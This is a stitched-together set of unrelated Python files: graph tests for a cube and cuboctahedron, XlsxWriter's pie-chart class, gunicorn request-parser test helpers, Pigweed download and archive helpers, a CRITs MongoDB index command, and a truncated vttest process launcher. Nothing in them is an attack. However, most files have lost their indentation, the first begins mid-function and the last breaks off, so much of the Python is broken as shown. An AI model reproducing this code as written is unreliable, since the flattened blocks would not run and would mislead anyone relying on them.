"""Graph of n-dimensional hypercube."""
singletons = [frozenset([x]) for x in range(n)]
return dict([(x, frozenset([x^s for s in singletons]))
for x in powerset(range(n))])
def linegraph(G):
"""Graph, the vertices of which are edges of G,
with two vertices being adjacent iff the corresponding
edges share a vertex."""
L = {}
for x in G:
for y in G[x]:
nx = [frozenset([x,z]) for z in G[x] if z != y]
ny = [frozenset([y,z]) for z in G[y] if z != x]
L[frozenset([x,y])] = frozenset(nx+ny)
return L
def faces(G):
    'Return a set of faces in G, where a face is a frozenset of the vertices on that face'
    # currently limited to triangles, squares, and pentagons
f = set()
for v1, edges in G.items():
for v2 in edges:
for v3 in G[v2]:
if v1 == v3:
continue
if v1 in G[v3]:
f.add(frozenset([v1, v2, v3]))
else:
for v4 in G[v3]:
if v4 == v2:
continue
if v1 in G[v4]:
f.add(frozenset([v1, v2, v3, v4]))
else:
for v5 in G[v4]:
if v5 == v3 or v5 == v2:
continue
if v1 in G[v5]:
f.add(frozenset([v1, v2, v3, v4, v5]))
return f
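# Worked example (editorial illustration): cube(2) is a 4-cycle on the subsets
# of {0, 1}, and faces() recovers its single square face, so
# len(faces(cube(2))) == 1 with every face containing 4 vertices; the tests
# below apply the same recipes to cube(3).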
class TestGraphs(unittest.TestCase):
def test_cube(self):
g = cube(3) # vert --> {v1, v2, v3}
vertices1 = set(g)
self.assertEqual(len(vertices1), 8) # eight vertices
for edge in g.values():
self.assertEqual(len(edge), 3) # each vertex connects to three edges
vertices2 = set(v for edges in g.values() for v in edges)
self.assertEqual(vertices1, vertices2) # edge vertices in original set
cubefaces = faces(g)
self.assertEqual(len(cubefaces), 6) # six faces
for face in cubefaces:
self.assertEqual(len(face), 4) # each face is a square
def test_cuboctahedron(self):
# http://en.wikipedia.org/wiki/Cuboctahedron
# 8 triangular faces and 6 square faces
# 12 identical vertices each connecting a triangle and square
g = cube(3)
        cuboctahedron = linegraph(g) # V --> {V1, V2, V3, V4}
self.assertEqual(len(cuboctahedron), 12)# twelve vertices
vertices = set(cuboctahedron)
for edges in cuboctahedron.values():
self.assertEqual(len(edges), 4) # each vertex connects to four other vertices
othervertices = set(edge for edges in cuboctahedron.values() for edge in edges)
self.assertEqual(vertices, othervertices) # edge vertices in original set
cubofaces = faces(cuboctahedron)
facesizes = collections.defaultdict(int)
for face in cubofaces:
facesizes[len(face)] += 1
self.assertEqual(facesizes[3], 8) # eight triangular faces
self.assertEqual(facesizes[4], 6) # six square faces
for vertex in cuboctahedron:
edge = vertex # Cuboctahedron vertices are edges in Cube
self.assertEqual(len(edge), 2) # Two cube vertices define an edge
for cubevert in edge:
self.assertIn(cubevert, g)
#==============================================================================
if __name__ == "__main__":
unittest.main()
|
|
###############################################################################
#
# ChartPie - A class for writing the Excel XLSX Pie charts.
#
# Copyright 2013-2017, John McNamara, jmcnamara@cpan.org
#
from warnings import warn
from . import chart
class ChartPie(chart.Chart):
"""
A class for writing the Excel XLSX Pie charts.
"""
###########################################################################
#
# Public API.
#
###########################################################################
def __init__(self, options=None):
"""
Constructor.
"""
super(ChartPie, self).__init__()
if options is None:
options = {}
self.vary_data_color = 1
self.rotation = 0
# Set the available data label positions for this chart type.
self.label_position_default = 'best_fit'
self.label_positions = {
'center': 'ctr',
'inside_end': 'inEnd',
'outside_end': 'outEnd',
'best_fit': 'bestFit'}
def set_rotation(self, rotation):
"""
Set the Pie/Doughnut chart rotation: the angle of the first slice.
Args:
rotation: First segment angle: 0 <= rotation <= 360.
Returns:
Nothing.
"""
if rotation is None:
return
# Ensure the rotation is in Excel's range.
if rotation < 0 or rotation > 360:
warn("Chart rotation %d outside Excel range: 0 <= rotation <= 360"
% rotation)
return
self.rotation = int(rotation)
###########################################################################
#
# Private API.
#
###########################################################################
def _write_chart_type(self, args):
# Override the virtual superclass method with a chart specific method.
# Write the c:pieChart element.
self._write_pie_chart(args)
###########################################################################
#
# XML methods.
#
###########################################################################
def _write_pie_chart(self, args):
# Write the <c:pieChart> element. Over-ridden method to remove
# axis_id code since Pie charts don't require val and cat axes.
self._xml_start_tag('c:pieChart')
# Write the c:varyColors element.
self._write_vary_colors()
# Write the series elements.
for data in self.series:
self._write_ser(data)
# Write the c:firstSliceAng element.
self._write_first_slice_ang()
self._xml_end_tag('c:pieChart')
def _write_plot_area(self):
# Over-ridden method to remove the cat_axis() and val_axis() code
# since Pie charts don't require those axes.
#
# Write the <c:plotArea> element.
self._xml_start_tag('c:plotArea')
# Write the c:layout element.
self._write_layout(self.plotarea.get('layout'), 'plot')
# Write the subclass chart type element.
self._write_chart_type(None)
self._xml_end_tag('c:plotArea')
def _write_legend(self):
# Over-ridden method to add <c:txPr> to legend.
# Write the <c:legend> element.
position = self.legend_position
font = self.legend_font
delete_series = []
overlay = 0
if (self.legend_delete_series is not None
and type(self.legend_delete_series) is list):
delete_series = self.legend_delete_series
if position.startswith('overlay_'):
position = position.replace('overlay_', '')
overlay = 1
allowed = {
'right': 'r',
'left': 'l',
'top': 't',
'bottom': 'b',
}
if position == 'none':
return
if position not in allowed:
return
position = allowed[position]
self._xml_start_tag('c:legend')
# Write the c:legendPos element.
self._write_legend_pos(position)
# Remove series labels from the legend.
for index in delete_series:
# Write the c:legendEntry element.
self._write_legend_entry(index)
# Write the c:layout element.
self._write_layout(self.legend_layout, 'legend')
# Write the c:overlay element.
if overlay:
self._write_overlay()
# Write the c:txPr element. Over-ridden.
self._write_tx_pr_legend(None, font)
self._xml_end_tag('c:legend')
def _write_tx_pr_legend(self, horiz, font):
# Write the <c:txPr> element for legends.
if font and font.get('rotation'):
rotation = font['rotation']
else:
rotation = None
self._xml_start_tag('c:txPr')
# Write the a:bodyPr element.
self._write_a_body_pr(rotation, horiz)
# Write the a:lstStyle element.
self._write_a_lst_style()
# Write the a:p element.
self._write_a_p_legend(font)
self._xml_end_tag('c:txPr')
def _write_a_p_legend(self, font):
# Write the <a:p> element for legends.
self._xml_start_tag('a:p')
# Write the a:pPr element.
self._write_a_p_pr_legend(font)
# Write the a:endParaRPr element.
self._write_a_end_para_rpr()
self._xml_end_tag('a:p')
def _write_a_p_pr_legend(self, font):
# Write the <a:pPr> element for legends.
attributes = [('rtl', 0)]
self._xml_start_tag('a:pPr', attributes)
# Write the a:defRPr element.
self._write_a_def_rpr(font)
self._xml_end_tag('a:pPr')
def _write_vary_colors(self):
# Write the <c:varyColors> element.
attributes = [('val', 1)]
self._xml_empty_tag('c:varyColors', attributes)
def _write_first_slice_ang(self):
# Write the <c:firstSliceAng> element.
attributes = [('val', self.rotation)]
self._xml_empty_tag('c:firstSliceAng', attributes)
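# Usage sketch (editorial illustration, not part of XlsxWriter itself): a pie
# chart produced by this class is normally reached through the public
# Workbook API. The file name, sheet data and cell ranges below are arbitrary
# example values; the function is defined but never called here.
def _example_pie_chart(filename='pie_example.xlsx'):
    import xlsxwriter

    workbook = xlsxwriter.Workbook(filename)
    worksheet = workbook.add_worksheet()

    # Sample data for the pie slices.
    worksheet.write_column('A1', ['Apple', 'Cherry', 'Pecan'])
    worksheet.write_column('B1', [60, 30, 10])

    chart = workbook.add_chart({'type': 'pie'})
    chart.add_series({
        'categories': '=Sheet1!$A$1:$A$3',
        'values': '=Sheet1!$B$1:$B$3',
    })
    chart.set_rotation(90)  # angle of the first slice, 0 <= rotation <= 360

    worksheet.insert_chart('D2', chart)
    workbook.close()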
|
|
# Copyright 2009 Paul J. Davis <paul.joseph.davis@gmail.com>
#
# This file is part of the pywebmachine package released
# under the MIT license.
import inspect
import os
import random
from gunicorn._compat import execfile_
from gunicorn.config import Config
from gunicorn.http.parser import RequestParser
from gunicorn.util import split_request_uri
from gunicorn import six
dirname = os.path.dirname(__file__)
random.seed()
def uri(data):
ret = {"raw": data}
parts = split_request_uri(data)
ret["scheme"] = parts.scheme or ''
ret["host"] = parts.netloc.rsplit(":", 1)[0] or None
ret["port"] = parts.port or 80
ret["path"] = parts.path or ''
ret["query"] = parts.query or ''
ret["fragment"] = parts.fragment or ''
return ret
def load_py(fname):
config = globals().copy()
config["uri"] = uri
config["cfg"] = Config()
execfile_(fname, config)
return config
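# A hedged sketch of what a request-expectation file loaded by load_py()
# might contain; the keys mirror the assertions in request.same() below,
# but the values here are illustrative only:
#
#   request = {
#       "method": "GET",
#       "uri": uri("/path?a=1"),
#       "version": (1, 1),
#       "headers": [("HOST", "example.com")],
#       "body": b"",
#   }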
class request(object):
def __init__(self, fname, expect):
self.fname = fname
self.name = os.path.basename(fname)
self.expect = expect
if not isinstance(self.expect, list):
self.expect = [self.expect]
with open(self.fname, 'rb') as handle:
self.data = handle.read()
self.data = self.data.replace(b"\n", b"").replace(b"\\r\\n", b"\r\n")
self.data = self.data.replace(b"\\0", b"\000")
# Functions for sending data to the parser.
# These functions mock out reading from a
# socket or other data source that might
# be used in real life.
def send_all(self):
yield self.data
def send_lines(self):
lines = self.data
pos = lines.find(b"\r\n")
while pos > 0:
yield lines[:pos+2]
lines = lines[pos+2:]
pos = lines.find(b"\r\n")
if lines:
yield lines
def send_bytes(self):
for d in self.data:
if six.PY3:
yield bytes([d])
else:
yield d
def send_random(self):
maxs = round(len(self.data) / 10)
read = 0
while read < len(self.data):
chunk = random.randint(1, maxs)
yield self.data[read:read+chunk]
read += chunk
def send_special_chunks(self):
"""Meant to test the request line length check.
Sends the request data in two chunks, one having a
length of 1 byte, which ensures that no CRLF is included,
and a second chunk containing the rest of the request data.
If the request line length check is not done properly,
testing the ``tests/requests/valid/099.http`` request
fails with a ``LimitRequestLine`` exception.
"""
chunk = self.data[:1]
read = 0
while read < len(self.data):
yield self.data[read:read+len(chunk)]
read += len(chunk)
chunk = self.data[read:]
# These functions define the sizes that the
# read functions will read with.
def size_all(self):
return -1
def size_bytes(self):
return 1
def size_small_random(self):
return random.randint(1, 4)
def size_random(self):
return random.randint(1, 4096)
# Match a body against various ways of reading
# a message. Pass in the request, expected body
# and one of the size functions.
def szread(self, func, sizes):
sz = sizes()
data = func(sz)
if sz >= 0 and len(data) > sz:
raise AssertionError("Read more than %d bytes: %s" % (sz, data))
return data
def match_read(self, req, body, sizes):
data = self.szread(req.body.read, sizes)
count = 1000
while body:
if body[:len(data)] != data:
raise AssertionError("Invalid body data read: %r != %r" % (
data, body[:len(data)]))
body = body[len(data):]
data = self.szread(req.body.read, sizes)
if not data:
count -= 1
if count <= 0:
raise AssertionError("Unexpected apparent EOF")
if body:
raise AssertionError("Failed to read entire body: %r" % body)
elif data:
raise AssertionError("Read beyond expected body: %r" % data)
data = req.body.read(sizes())
if data:
raise AssertionError("Read after body finished: %r" % data)
def match_readline(self, req, body, sizes):
data = self.szread(req.body.readline, sizes)
count = 1000
while body:
if body[:len(data)] != data:
raise AssertionError("Invalid data read: %r" % data)
if b'\n' in data[:-1]:
raise AssertionError("Embedded new line: %r" % data)
body = body[len(data):]
data = self.szread(req.body.readline, sizes)
if not data:
count -= 1
if count <= 0:
raise AssertionError("Apparent unexpected EOF")
if body:
raise AssertionError("Failed to read entire body: %r" % body)
elif data:
raise AssertionError("Read beyond expected body: %r" % data)
data = req.body.readline(sizes())
if data:
raise AssertionError("Read data after body finished: %r" % data)
def match_readlines(self, req, body, sizes):
"""\
This skips the sizes checks as we don't implement them.
"""
data = req.body.readlines()
for line in data:
if b'\n' in line[:-1]:
raise AssertionError("Embedded new line: %r" % line)
if line != body[:len(line)]:
raise AssertionError("Invalid body data read: %r != %r" % (
line, body[:len(line)]))
body = body[len(line):]
if body:
raise AssertionError("Failed to read entire body: %r" % body)
data = req.body.readlines(sizes())
if data:
raise AssertionError("Read data after body finished: %r" % data)
def match_iter(self, req, body, sizes):
"""\
This skips sizes because sizes are not part of the iter API.
"""
for line in req.body:
if b'\n' in line[:-1]:
raise AssertionError("Embedded new line: %r" % line)
if line != body[:len(line)]:
raise AssertionError("Invalid body data read: %r != %r" % (
line, body[:len(line)]))
body = body[len(line):]
if body:
raise AssertionError("Failed to read entire body: %r" % body)
try:
data = six.next(iter(req.body))
raise AssertionError("Read data after body finished: %r" % data)
except StopIteration:
pass
# Construct a series of test cases from the permutations of
# send, size, and match functions.
def gen_cases(self, cfg):
def get_funs(p):
return [v for k, v in inspect.getmembers(self) if k.startswith(p)]
senders = get_funs("send_")
sizers = get_funs("size_")
matchers = get_funs("match_")
cfgs = [
(mt, sz, sn)
for mt in matchers
for sz in sizers
for sn in senders
]
ret = []
for (mt, sz, sn) in cfgs:
if hasattr(mt, 'func_name'):
mtn = mt.func_name[6:]
szn = sz.func_name[5:]
snn = sn.func_name[5:]
else:
mtn = mt.__name__[6:]
szn = sz.__name__[5:]
snn = sn.__name__[5:]
def test_req(sn, sz, mt):
self.check(cfg, sn, sz, mt)
desc = "%s: MT: %s SZ: %s SN: %s" % (self.name, mtn, szn, snn)
test_req.description = desc
ret.append((test_req, sn, sz, mt))
return ret
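# A hedged sketch of how the generated cases might be consumed by a test
# runner; the expectation file path is a placeholder and "expect" is the
# parsed expectation loaded from it:
#
#   treq = request("tests/requests/valid/001.http", expect)
#   for test_fn, sn, sz, mt in treq.gen_cases(Config()):
#       test_fn(sn, sz, mt)   # runs check() for one send/size/match combo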
def check(self, cfg, sender, sizer, matcher):
cases = self.expect[:]
p = RequestParser(cfg, sender())
for req in p:
self.same(req, sizer, matcher, cases.pop(0))
assert not cases
def same(self, req, sizer, matcher, exp):
assert req.method == exp["method"]
assert req.uri == exp["uri"]["raw"]
assert req.path == exp["uri"]["path"]
assert req.query == exp["uri"]["query"]
assert req.fragment == exp["uri"]["fragment"]
assert req.version == exp["version"]
assert req.headers == exp["headers"]
matcher(req, exp["body"], sizer)
assert req.trailers == exp.get("trailers", [])
class badrequest(object):
def __init__(self, fname):
self.fname = fname
self.name = os.path.basename(fname)
with open(self.fname) as handle:
self.data = handle.read()
self.data = self.data.replace("\n", "").replace("\\r\\n", "\r\n")
self.data = self.data.replace("\\0", "\000")
self.data = self.data.encode('latin1')
def send(self):
maxs = round(len(self.data) / 10)
read = 0
while read < len(self.data):
chunk = random.randint(1, maxs)
yield self.data[read:read+chunk]
read += chunk
def check(self, cfg):
p = RequestParser(cfg, self.send())
six.next(p)
|
|
#!/usr/bin/env python3
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""File Helper Functions."""
import glob
import hashlib
import json
import logging
import os
import shutil
import sys
import subprocess
import tarfile
import urllib.request
import zipfile
from pathlib import Path
from typing import List
_LOG = logging.getLogger(__name__)
class InvalidChecksumError(Exception):
pass
def find_files(starting_dir: str,
patterns: List[str],
directories_only=False) -> List[str]:
original_working_dir = os.getcwd()
if not (os.path.exists(starting_dir) and os.path.isdir(starting_dir)):
raise FileNotFoundError(
"Directory '{}' does not exist.".format(starting_dir))
os.chdir(starting_dir)
files = []
for pattern in patterns:
for file_path in glob.glob(pattern, recursive=True):
if not directories_only or os.path.isdir(file_path):
files.append(file_path)
os.chdir(original_working_dir)
return sorted(files)
def sha256_sum(file_name):
hash_sha256 = hashlib.sha256()
with open(file_name, "rb") as file_handle:
for chunk in iter(lambda: file_handle.read(4096), b""):
hash_sha256.update(chunk)
return hash_sha256.hexdigest()
def md5_sum(file_name):
hash_md5 = hashlib.md5()
with open(file_name, "rb") as file_handle:
for chunk in iter(lambda: file_handle.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify_file_checksum(file_path,
expected_checksum,
sum_function=sha256_sum):
downloaded_checksum = sum_function(file_path)
if downloaded_checksum != expected_checksum:
raise InvalidChecksumError(
f"Invalid {sum_function.__name__}\n"
f"{downloaded_checksum} {os.path.basename(file_path)}\n"
f"{expected_checksum} (expected)\n\n"
"Please delete this file and try again:\n"
f"{file_path}")
_LOG.debug(" %s:", sum_function.__name__)
_LOG.debug(" %s %s", downloaded_checksum, os.path.basename(file_path))
return True
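# A hedged usage sketch; the path and digest below are placeholders:
#
#   verify_file_checksum("downloads/package.tar.gz",
#                        "<expected sha256 hex digest>",
#                        sum_function=sha256_sum)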
def relative_or_absolute_path(file_string: str):
"""Return a Path relative to os.getcwd(), else an absolute path."""
file_path = Path(file_string)
try:
return file_path.relative_to(os.getcwd())
except ValueError:
return file_path.resolve()
def download_to_cache(url: str,
expected_md5sum=None,
expected_sha256sum=None,
cache_directory=".cache",
downloaded_file_name=None) -> str:
cache_dir = os.path.realpath(
os.path.expanduser(os.path.expandvars(cache_directory)))
if not downloaded_file_name:
# Use the last part of the URL as the file name.
downloaded_file_name = url.split("/")[-1]
downloaded_file = os.path.join(cache_dir, downloaded_file_name)
if not os.path.exists(downloaded_file):
_LOG.info("Downloading: %s", url)
_LOG.info("Please wait...")
urllib.request.urlretrieve(url, filename=downloaded_file)
if os.path.exists(downloaded_file):
_LOG.info("Downloaded: %s", relative_or_absolute_path(downloaded_file))
if expected_sha256sum:
verify_file_checksum(downloaded_file,
expected_sha256sum,
sum_function=sha256_sum)
elif expected_md5sum:
verify_file_checksum(downloaded_file,
expected_md5sum,
sum_function=md5_sum)
return downloaded_file
def extract_zipfile(archive_file: str, dest_dir: str):
"""Extract a zipfile preseving permissions."""
destination_path = Path(dest_dir)
with zipfile.ZipFile(archive_file) as archive:
for info in archive.infolist():
archive.extract(info.filename, path=dest_dir)
permissions = info.external_attr >> 16
out_path = destination_path / info.filename
out_path.chmod(permissions)
def extract_tarfile(archive_file: str, dest_dir: str):
with tarfile.open(archive_file, 'r') as archive:
archive.extractall(path=dest_dir)
def extract_archive(archive_file: str,
dest_dir: str,
cache_dir: str,
remove_single_toplevel_folder=True):
"""Extract a tar or zip file.
Args:
archive_file (str): Absolute path to the archive file.
dest_dir (str): Extraction destination directory.
cache_dir (str): Directory where temp files can be created.
remove_single_toplevel_folder (bool): If the archive contains only a
single top-level folder, move the contents of that folder into the
destination directory.
"""
# Make a temporary directory to extract files into
temp_extract_dir = os.path.join(cache_dir,
"." + os.path.basename(archive_file))
os.makedirs(temp_extract_dir, exist_ok=True)
_LOG.info("Extracting: %s", relative_or_absolute_path(archive_file))
if zipfile.is_zipfile(archive_file):
extract_zipfile(archive_file, temp_extract_dir)
elif tarfile.is_tarfile(archive_file):
extract_tarfile(archive_file, temp_extract_dir)
else:
_LOG.error("Unknown archive format: %s", archive_file)
sys.exit(1)
_LOG.info("Installing into: %s", relative_or_absolute_path(dest_dir))
path_to_extracted_files = temp_extract_dir
extracted_top_level_files = os.listdir(temp_extract_dir)
# Check if the archive contains only one top-level folder.
# If so, make that the new path_to_extracted_files.
if remove_single_toplevel_folder and len(extracted_top_level_files) == 1:
path_to_extracted_files = os.path.join(temp_extract_dir,
extracted_top_level_files[0])
# Move extracted files to dest_dir
extracted_files = os.listdir(path_to_extracted_files)
for file_name in extracted_files:
source_file = os.path.join(path_to_extracted_files, file_name)
dest_file = os.path.join(dest_dir, file_name)
shutil.move(source_file, dest_file)
# rm -rf temp_extract_dir
shutil.rmtree(temp_extract_dir, ignore_errors=True)
# Return List of extracted files
return list(Path(dest_dir).rglob("*"))
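# A hedged end-to-end sketch combining the helpers above; the URL and
# directories are placeholders, not values used by this module.
def _example_fetch_and_extract(dest_dir='tools', cache_dir='.cache'):
    os.makedirs(cache_dir, exist_ok=True)
    os.makedirs(dest_dir, exist_ok=True)
    archive = download_to_cache(
        url='https://example.com/toolchain.tar.gz',  # hypothetical URL
        expected_sha256sum=None,  # supply a real digest to enable verification
        cache_directory=cache_dir)
    return extract_archive(archive, dest_dir, cache_dir)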
def remove_empty_directories(directory):
"""Recursively remove empty directories."""
for path in sorted(Path(directory).rglob("*"), reverse=True):
# If broken symlink
if path.is_symlink() and not path.exists():
path.unlink()
# if empty directory
elif path.is_dir() and len(os.listdir(path)) == 0:
path.rmdir()
def decode_file_json(file_name):
"""Decode JSON values from a file.
Does not raise an error if the file cannot be decoded."""
# Get absolute path to the file.
file_path = os.path.realpath(
os.path.expanduser(os.path.expandvars(file_name)))
json_file_options = {}
try:
with open(file_path, "r") as jfile:
json_file_options = json.loads(jfile.read())
except (FileNotFoundError, json.JSONDecodeError):
_LOG.warning("Unable to read file '%s'", file_path)
return json_file_options, file_path
def git_apply_patch(root_directory,
patch_file,
ignore_whitespace=True,
unsafe_paths=False):
"""Use `git apply` to apply a diff file."""
_LOG.info("Applying Patch: %s", patch_file)
git_apply_command = ["git", "apply"]
if ignore_whitespace:
git_apply_command.append("--ignore-whitespace")
if unsafe_paths:
git_apply_command.append("--unsafe-paths")
git_apply_command += ["--directory", root_directory, patch_file]
subprocess.run(git_apply_command)
|
|
import pymongo
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from crits.core.mongo_tools import mongo_connector
class Command(BaseCommand):
"""
Script Class.
"""
option_list = BaseCommand.option_list + (
make_option('--remove-indexes',
'-r',
action='store_true',
dest='remove',
default=False,
help='Remove all indexes. Does NOT create.'),
)
help = 'Creates indexes for MongoDB.'
def handle(self, *args, **options):
"""
Script Execution.
"""
remove = options.get('remove')
if remove:
remove_indexes()
else:
create_indexes()
def remove_indexes():
"""
Removes all indexes from all collections.
"""
coll_list = [settings.COL_BACKDOORS,
settings.COL_BUCKET_LISTS,
settings.COL_CAMPAIGNS,
settings.COL_COMMENTS,
settings.COL_DOMAINS,
settings.COL_EMAIL,
settings.COL_EVENTS,
settings.COL_EXPLOITS,
settings.COL_INDICATORS,
settings.COL_IPS,
settings.COL_NOTIFICATIONS,
'%s.files' % settings.COL_OBJECTS,
'%s.chunks' % settings.COL_OBJECTS,
settings.COL_PCAPS,
'%s.files' % settings.COL_PCAPS,
'%s.chunks' % settings.COL_PCAPS,
settings.COL_SAMPLES,
'%s.files' % settings.COL_SAMPLES,
'%s.chunks' % settings.COL_SAMPLES,
settings.COL_TARGETS,
]
for coll in coll_list:
print "Removing index for: %s" % coll
c = mongo_connector(coll)
c.drop_indexes()
def create_indexes():
"""
Creates the default set of indexes for the system. Depending on your use
cases, as well as quantity of data, admins may wish to tweak these indexes
to best fit their requirements.
"""
print "Creating indexes (duplicates will be ignored automatically)"
analysis_results = mongo_connector(settings.COL_ANALYSIS_RESULTS)
analysis_results.ensure_index("service_name", background=True)
analysis_results.ensure_index("object_type", background=True)
analysis_results.ensure_index("object_id", background=True)
bucket_lists = mongo_connector(settings.COL_BUCKET_LISTS)
bucket_lists.ensure_index("name", background=True)
backdoors = mongo_connector(settings.COL_BACKDOORS)
backdoors.ensure_index("name", background=True)
campaigns = mongo_connector(settings.COL_CAMPAIGNS)
campaigns.ensure_index("objects.value", background=True)
campaigns.ensure_index("relationships.value", background=True)
campaigns.ensure_index("bucket_list", background=True)
comments = mongo_connector(settings.COL_COMMENTS)
comments.ensure_index("obj_id", background=True)
comments.ensure_index("users", background=True)
comments.ensure_index("tags", background=True)
comments.ensure_index("status", background=True)
domains = mongo_connector(settings.COL_DOMAINS)
domains.ensure_index("domain", background=True)
domains.ensure_index("objects.value", background=True)
domains.ensure_index("relationships.value", background=True)
domains.ensure_index("campaign.name", background=True)
domains.ensure_index("bucket_list", background=True)
emails = mongo_connector(settings.COL_EMAIL)
emails.ensure_index("objects.value", background=True)
emails.ensure_index("relationships.value", background=True)
emails.ensure_index("campaign.name", background=True)
emails.ensure_index("bucket_list", background=True)
events = mongo_connector(settings.COL_EVENTS)
events.ensure_index("objects.value", background=True)
events.ensure_index("relationships.value", background=True)
events.ensure_index("campaign.name", background=True)
events.ensure_index("bucket_list", background=True)
exploits = mongo_connector(settings.COL_EXPLOITS)
exploits.ensure_index("name", background=True)
indicators = mongo_connector(settings.COL_INDICATORS)
indicators.ensure_index("value", background=True)
indicators.ensure_index("objects.value", background=True)
indicators.ensure_index("relationships.value", background=True)
indicators.ensure_index("campaign.name", background=True)
indicators.ensure_index("bucket_list", background=True)
ips = mongo_connector(settings.COL_IPS)
ips.ensure_index("ip", background=True)
ips.ensure_index("objects.value", background=True)
ips.ensure_index("relationships.value", background=True)
ips.ensure_index("campaign.name", background=True)
ips.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
objects_files = mongo_connector('%s.files' % settings.COL_OBJECTS)
objects_files.ensure_index("md5", background=True)
objects_chunks = mongo_connector('%s.chunks' % settings.COL_OBJECTS)
objects_chunks.ensure_index([("files_id",pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
notifications = mongo_connector(settings.COL_NOTIFICATIONS)
notifications.ensure_index("obj_id", background=True)
# auto-expire notifications after 30 days
notifications.ensure_index("date", background=True,
expireAfterSeconds=2592000)
notifications.ensure_index("users", background=True)
pcaps = mongo_connector(settings.COL_PCAPS)
pcaps.ensure_index("md5", background=True)
pcaps.ensure_index("objects.value", background=True)
pcaps.ensure_index("relationships.value", background=True)
pcaps.ensure_index("campaign.name", background=True)
pcaps.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
pcaps_files = mongo_connector('%s.files' % settings.COL_PCAPS)
pcaps_files.ensure_index("md5", background=True)
pcaps_chunks = mongo_connector('%s.chunks' % settings.COL_PCAPS)
pcaps_chunks.ensure_index([("files_id", pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
raw_data = mongo_connector(settings.COL_RAW_DATA)
raw_data.ensure_index("link_id", background=True)
raw_data.ensure_index("md5", background=True)
raw_data.ensure_index("objects.value", background=True)
raw_data.ensure_index("relationships.value", background=True)
raw_data.ensure_index("campaign.name", background=True)
raw_data.ensure_index("bucket_list", background=True)
signature = mongo_connector(settings.COL_SIGNATURES)
signature.ensure_index("link_id", background=True)
signature.ensure_index("md5", background=True)
signature.ensure_index("objects.value", background=True)
signature.ensure_index("relationships.value", background=True)
signature.ensure_index("campaign.name", background=True)
signature.ensure_index("bucket_list", background=True)
samples = mongo_connector(settings.COL_SAMPLES)
samples.ensure_index("source.name", background=True)
samples.ensure_index("md5", background=True)
samples.ensure_index("sha1", background=True)
samples.ensure_index("sha256", background=True)
samples.ensure_index("ssdeep", background=True)
samples.ensure_index("mimetype", background=True)
samples.ensure_index("filetype", background=True)
samples.ensure_index("size", background=True)
samples.ensure_index("filename", background=True)
samples.ensure_index("objects.value", background=True)
samples.ensure_index("relationships.value", background=True)
samples.ensure_index("campaign.name", background=True)
samples.ensure_index("analysis.results.result", background=True)
samples.ensure_index("analysis.results.md5", background=True)
samples.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
samples_files = mongo_connector('%s.files' % settings.COL_SAMPLES)
samples_files.ensure_index("md5", background=True)
samples_chunks = mongo_connector('%s.chunks' % settings.COL_SAMPLES)
samples_chunks.ensure_index([("files_id", pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
screenshots = mongo_connector(settings.COL_SCREENSHOTS)
screenshots.ensure_index("tags", background=True)
targets = mongo_connector(settings.COL_TARGETS)
targets.ensure_index("objects.value", background=True)
targets.ensure_index("relationships.value", background=True)
targets.ensure_index("campaign.name", background=True)
targets.ensure_index("bucket_list", background=True)
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
"""Starts the vtcombo process."""
import json
import logging
import os
import socket
import subprocess
import time
import urllib
from vttest import environment
class ShardInfo(object):
"""Contains the description for setting up a test shard.
Every shard should have a unique db_name, since they're all stored in a single
MySQL instance for the purpose of this test.
"""
def __init__(self, keyspace, shard_name, db_name):
self.keyspace = keyspace
self.name = shard_name
self.db_name = db_name
class VtProcess(object):
"""Base class for a vt process, vtcombo only now."""
START_RETRIES = 5
def __init__(self, name, directory, binary, port_name):
self.name = name
self.directory = directory
self.binary = binary
self.extraparams = []
self.port_name = port_name
self.process = None
def wait_start(self):
"""Start the process and wait for it to respond on HTTP."""
for _ in xrange(0, self.START_RETRIES):
self.port = environment.get_port(self.port_name)
if environment.get_protocol() == 'grpc':
self.grpc_port = environment.get_port(self.port_name, protocol='grpc')
else:
self.grpc_port = None
logs_subdirectory = environment.get_logs_directory(self.directory)
cmd = [
self.binary,
'-port', '%u' % self.port,
'-log_dir', logs_subdirectory,
]
if environment.get_protocol() == 'grpc':
cmd.extend(['-grpc_port', '%u' % self.grpc_port])
cmd.extend(self.extraparams)
logging.info('Starting process: %s', cmd)
stdout = os.path.join(logs_subdirectory, '%s.%d.log' %
(self.name, self.port))
self.stdout = open(stdout, 'w')
self.process = subprocess.Popen(cmd,
stdout=self.stdout,
stderr=subprocess.STDOUT)
timeout = time.time() + 60.0
while time.time() < timeout:
if environment.process_is_healthy(
self.name, self.addr()) and self.get_vars():
logging.info('%s started.', self.name)
return
elif self.process.poll() is not None:
logging.error('%s process exited prematurely.', self.name)
break
time.sleep(0.3)
logging.error('cannot start %s process in time: %s',
self.name, socket.getfqdn())
self.kill()
raise Exception('Failed %d times to run %s' % (
self.START_RETRIES,
self.name))
def addr(self):
"""Return the host:port of the process."""
return '%s:%u' % (socket.getfqdn(), self.port)
def grpc_addr(self):
"""Return the grpc host:port of the process.
Only call this if environment.get_protocol() == 'grpc'."""
return '%s:%u' % (socket.getfqdn(), self.grpc_port)
def get_vars(self):
"""Return the debug vars."""
data = None
try:
url = 'http://%s/debug/vars' % self.addr()
f = urllib.urlopen(url)
data = f.read()
f.close()
except IOError:
return None
try:
return json.loads(data)
except ValueError:
logging.error('%s', data)
raise
def kill(self):
"""Kill the process."""
# These will proceed without error even if the process is already gone.
self.process.terminate()
def wait(self):
"""Wait for the process to end."""
self.process.wait()
class VtcomboProcess(VtProcess):
"""Represents a vtcombo subprocess."""
QUERYSERVER_PARAMETERS = [
'-queryserver-config-pool-size', '4',
